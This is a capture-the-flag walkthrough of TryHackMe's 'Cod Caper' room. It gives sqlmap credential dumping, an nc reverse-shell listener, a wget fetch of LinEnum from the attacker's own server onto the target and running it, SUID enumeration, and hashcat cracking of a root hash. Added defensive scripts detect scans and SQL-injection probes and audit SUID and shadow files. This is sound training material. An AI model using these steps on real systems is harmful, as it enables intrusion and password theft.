[ The Cod Caper ] - TRYHACKME

  



Check out the room

https://tryhackme.com/room/thecodcaper

Hello everyone, this is another TryHackMe walkthrough blog. This room shows a few tricks for obtaining the root password of a Linux machine.

Room name : The Cod Caper

Machine Type : Linux

Task 2 

We'll run nmap against the target:

#nmap -sV -A -p1-1000 -T4 -oN initial <target-machine-ip>

Task 3

As recommended in the TryHackMe Cod Caper room, we'll use gobuster for directory enumeration; the wordlist for gobuster is provided for download in the task.

Don't forget to use the -x flag to search for specific extensions like ".html, .txt, .php".

#gobuster dir -u <target_url> -w "path/of/wordlist" -x ".php"

The -x flag matters because we need to check for specific extensions like ".html, .php".

After the gobuster directory brute-force we find an admin login page, but we don't have a username and password, so we have to find credentials to access it.

Task 4

We'll use sqlmap for further exploitation, since this tool is suggested by the room.

#sqlmap -u "<target_link_of_the_admin_page>" --forms --dump --dbs --batch

After running this command we'll get the username and password for the admin login page.
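Seen from the server side, the gobuster and sqlmap steps above leave a recognisable trace in the web access log. The following Python script is an added example (not part of the room or of this write-up) that runs two detections over constructed combined-format log lines: a per-client sliding window that flags a burst of 404 responses, and a check for sqlmap's user agent or injection-looking query strings. The log lines, client IPs and paths are made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Apache/nginx "combined" log format: client, identity, user, [timestamp], "request",
# status, bytes, "referer", "user-agent". Only the fields the detections need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Crude SQL-injection probe patterns, matched against the URL-decoded request target.
SQLI_RE = re.compile(
    r"['\"]\s*(?:or|and)\s+\d+\s*=\s*\d+|union\s+(?:all\s+)?select|sleep\s*\(|benchmark\s*\(",
    re.IGNORECASE,
)


def build_sample_log():
    """Constructed sample log lines (not from the room); the paths and IPs are made up."""
    lines = [
        '10.0.0.5 - - [12/Mar/2021:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
        '10.0.0.5 - - [12/Mar/2021:10:00:40 +0000] "GET /missing.png HTTP/1.1" 404 162 "-" "Mozilla/5.0"',
        '10.0.0.7 - - [12/Mar/2021:10:02:10 +0000] "GET /admin/login.php?user=admin%27%20AND%201%3D1--%20 HTTP/1.1" 200 900 "-" "sqlmap/1.4"',
        '10.0.0.7 - - [12/Mar/2021:10:02:11 +0000] "GET /admin/login.php?user=admin%27%20UNION%20SELECT%201%2C2-- HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    ]
    # 25 not-found responses to one client inside a minute: the trace a wordlist scan leaves behind.
    for i in range(25):
        lines.append(
            f'10.0.0.9 - - [12/Mar/2021:10:01:{i:02d} +0000] "GET /guess{i}.php HTTP/1.1" 404 162 "-" "gobuster/3.1.0"'
        )
    return lines


def parse_line(line):
    """Return a dict for one combined-format line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "target": m["target"],
        "status": int(m["status"]),
        "ua": m["ua"],
    }


def detect_dir_bruteforce(entries, window=timedelta(seconds=60), threshold=20):
    """Clients with at least `threshold` 404 responses inside any `window` (sliding window per client)."""
    stamps_by_ip = defaultdict(list)
    for e in entries:
        if e["status"] == 404:
            stamps_by_ip[e["ip"]].append(e["ts"])
    flagged = set()
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(ip)
                break
    return flagged


def detect_sqli_probes(entries):
    """(client, decoded target) pairs whose user agent names sqlmap or whose query looks injected."""
    hits = []
    for e in entries:
        decoded = unquote_plus(e["target"])
        if "sqlmap" in e["ua"].lower() or SQLI_RE.search(decoded):
            hits.append((e["ip"], decoded))
    return hits


def analyze(lines):
    """Run both detections over raw log lines; unparsable lines are skipped."""
    entries = [e for e in map(parse_line, lines) if e]
    return {
        "dir_bruteforce": detect_dir_bruteforce(entries),
        "sqli_probes": detect_sqli_probes(entries),
    }


if __name__ == "__main__":
    for name, result in analyze(build_sample_log()).items():
        print(name, result)
```

The 404 threshold and window are deliberately loose; on a real site tune them against a baseline of normal broken-link traffic, and note that sqlmap's `--forms` probes arrive as POST bodies, which a standard access log does not record, so the user-agent and timing signals matter more than the query-string check.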

Task 5

In the previous task we found the login page, and with sqlmap we have the username and password; after a successful login we'll see a page like the one below.

This page is vulnerable to command execution.

(screenshot of the admin page with the command column)

Now we'll use nc to catch a reverse shell from the target machine.

Payload link : Pentestmonkey

#nc -nlvp 4444

With this nc command my machine listens on port 4444.

Now we have to run the payload in the command column (see the above image); here I am using the python payload.

Before sending it to the command column, modify the IP address and port in the payload.

Here my port is 4444, but you can use a different port.

Note: the IP address to use is shown on the THM access page (your virtual IP address).

Luckily we get a reverse shell by running the python payload on the command page.

On further enumeration we'll find the hidden password for the SSH user.

You will find the hidden password at /var/hidden/pass by using the find command:

#find / -name pass -type f 2>/dev/null

Task 6

Prepare the enumeration script on your machine.

#mkdir linenum

#cd linenum/

LinEnum and its script can be found on GitHub.

#wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

#python3 -m http.server 80

Download the script on the target machine.

Log in to the target machine over SSH as the user pingu.

pingu@ubuntu$ cd /tmp

pingu@ubuntu$ wget <your_IP>:80/LinEnum.sh

pingu@ubuntu$ ls -la

pingu@ubuntu$ chmod +x LinEnum.sh

pingu@ubuntu$ ls -la

pingu@ubuntu$ ./LinEnum.sh

Now look for SUID files in the results, because a SUID binary is how we can reach root.
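The reason the SUID list in the LinEnum output matters is that every set-uid file is a root-owned program any local user can start; the defender's counterpart of this step is a baseline audit. The script below is an added example (not from the room, this write-up or LinEnum) that parses `ls -l` style lines of the kind LinEnum prints, flags set-uid files that are not in an expected baseline, sit in a user-writable directory, or are world-writable, and also includes a live scanner for a host you administer. The baseline set and the sample lines are constructed; none of the paths come from the room.

```python
import os
import stat

# Set-uid binaries expected on a stock Ubuntu host. Constructed and abbreviated for this example:
# a real baseline is recorded from a known-good build of the same image.
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount", "/usr/bin/umount",
    "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
}

# Locations where an unprivileged user can drop files; a set-uid file here deserves a look.
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

# Constructed `ls -l` style lines, the shape LinEnum and `find / -perm -4000 -exec ls -l {} \;`
# print. None of these entries come from the room.
SAMPLE_FIND_OUTPUT = [
    "-rwsr-xr-x 1 root root 44664 Jan 25 2020 /usr/bin/passwd",
    "-rwsr-xr-x 1 root root 166056 Jan 19 2021 /usr/bin/sudo",
    "-rwxr-sr-x 1 root shadow 31248 Jan 19 2021 /usr/bin/expiry",
    "-rwsr-xr-x 1 root root 8544 Jul 2 2020 /opt/example/helper",
    "-rwsrwxrwx 1 root root 16712 Feb 3 2021 /tmp/backup-tool",
]


def parse_ls_line(line):
    """Split one `ls -l` line into the fields the audit needs; None for lines that are not entries."""
    fields = line.split(None, 8)   # mode, links, owner, group, size, month, day, year-or-time, path
    if len(fields) < 9 or len(fields[0]) < 10:
        return None
    mode, owner, path = fields[0], fields[2], fields[8]
    return {
        "path": path,
        "owner": owner,
        "setuid": mode[3] in "sS",          # 's' in the owner-execute slot
        "setgid": mode[6] in "sS",          # 's' in the group-execute slot
        "world_writable": mode[8] == "w",   # 'w' in the others-write slot
    }


def audit_suid(lines, baseline=EXPECTED_SUID):
    """Return (path, reason) findings for every set-uid entry that deviates from the baseline."""
    findings = []
    for line in lines:
        entry = parse_ls_line(line)
        if not entry or not entry["setuid"]:
            continue
        path = entry["path"]
        if path not in baseline:
            findings.append((path, "set-uid binary not in baseline"))
        if path.startswith(USER_WRITABLE_PREFIXES):
            findings.append((path, "set-uid binary in a user-writable location"))
        if entry["world_writable"]:
            findings.append((path, "set-uid binary is world-writable"))
    return findings


def scan_suid_live(root="/"):
    """Walk a filesystem you administer and return the set-uid regular files found (no sample data)."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:       # unreadable or vanished entries (e.g. under /proc) are skipped
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(full)
    return found


if __name__ == "__main__":
    for path, reason in audit_suid(SAMPLE_FIND_OUTPUT):
        print(f"{path}: {reason}")
```

Run periodically, the difference between `scan_suid_live()` and the recorded baseline is the same signal a file-integrity monitor gives: a new set-uid binary under /opt or /tmp is worth a ticket before anyone finds it with LinEnum.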

Task 10

Now we have the root hash; save the hash to a file, e.g. root.txt.

Now we'll use hashcat to crack the root hash.

Don't forget to use the --force flag if you are running in a VM.

#hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt

Once the hash is cracked we have the root password.
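The `-m 1800` in the hashcat command selects sha512crypt, the `$6$` format Linux writes to /etc/shadow; the mode is read off the hash's leading identifier. The script below is an added example (not from the room or this write-up) that parses shadow-format entries, reports the algorithm, round count and hashcat mode for each, and flags what a defender would fix first: empty passwords, legacy md5crypt hashes and round counts lowered below the default. The entries and digests are constructed placeholders, not real hashes.

```python
# crypt(3) algorithm identifiers and the matching hashcat mode (None where hashcat has no mode).
CRYPT_IDS = {
    "1": ("md5crypt", 500),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
    "y": ("yescrypt", None),
}
DEFAULT_ROUNDS = {"5": 5000, "6": 5000}   # glibc default when no rounds= parameter is present

# Constructed shadow entries; the digests are placeholders, not real hashes.
SAMPLE_SHADOW = [
    "root:$6$rounds=1000$c0nstructedSalt$PLACEHOLDER_DIGEST_NOT_A_REAL_HASH:18700:0:99999:7:::",
    "pingu:$6$c0nstructed$PLACEHOLDER_DIGEST_NOT_A_REAL_HASH:18700:0:99999:7:::",
    "backup:$1$c0nstr$PLACEHOLDER_MD5:18700:0:99999:7:::",
    "guest::18700:0:99999:7:::",
    "daemon:*:18474:0:99999:7:::",
    "sshd:!:18474:0:99999:7:::",
]


def parse_crypt_hash(h):
    """Identify the algorithm, round count and hashcat mode of one crypt(3) hash field."""
    if h == "":
        return {"algo": "empty", "rounds": None, "hashcat_mode": None}
    if h.startswith(("!", "*")):
        return {"algo": "locked", "rounds": None, "hashcat_mode": None}
    parts = h.split("$")                  # "$6$rounds=N$salt$digest" -> ["", "6", "rounds=N", "salt", "digest"]
    if len(parts) < 4 or parts[0] != "":
        return {"algo": "unknown", "rounds": None, "hashcat_mode": None}
    ident = parts[1]
    algo, mode = CRYPT_IDS.get(ident, ("unknown", None))
    rounds = DEFAULT_ROUNDS.get(ident)
    for param in parts[2:-1]:             # parameters sit between the id and the digest
        if param.startswith("rounds="):
            rounds = int(param[len("rounds="):])
    return {"algo": algo, "rounds": rounds, "hashcat_mode": mode}


def parse_shadow_line(line):
    """Split a shadow entry (user:hash:lastchange:min:max:warn:inactive:expire:) and classify its hash."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        return None
    info = parse_crypt_hash(fields[1])
    info["user"] = fields[0]
    return info


def audit_shadow(lines, min_rounds=5000):
    """(user, reason) findings: passwordless accounts, fast legacy algorithms, weakened round counts."""
    findings = []
    for line in lines:
        info = parse_shadow_line(line)
        if not info or info["algo"] == "locked":
            continue
        user = info["user"]
        if info["algo"] == "empty":
            findings.append((user, "account has an empty password"))
        elif info["algo"] == "md5crypt":
            findings.append((user, "md5crypt hash (hashcat mode 500) is fast to brute-force; rehash with sha512crypt or yescrypt"))
        elif info["rounds"] is not None and info["rounds"] < min_rounds:
            findings.append((user, f"{info['algo']} rounds={info['rounds']} is below the minimum of {min_rounds}"))
    return findings


if __name__ == "__main__":
    for line in SAMPLE_SHADOW:
        info = parse_shadow_line(line)
        print(f"{info['user']:8} {info['algo']:12} rounds={info['rounds']} hashcat_mode={info['hashcat_mode']}")
    for user, reason in audit_shadow(SAMPLE_SHADOW):
        print(f"FINDING {user}: {reason}")
```

The round count is the knob that decides how expensive a wordlist run like the one above is: every `rounds=` increase multiplies the cost per guess, while md5crypt and a readable shadow file make the attacker's job cheap regardless of password length.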

Thanks for Reading.
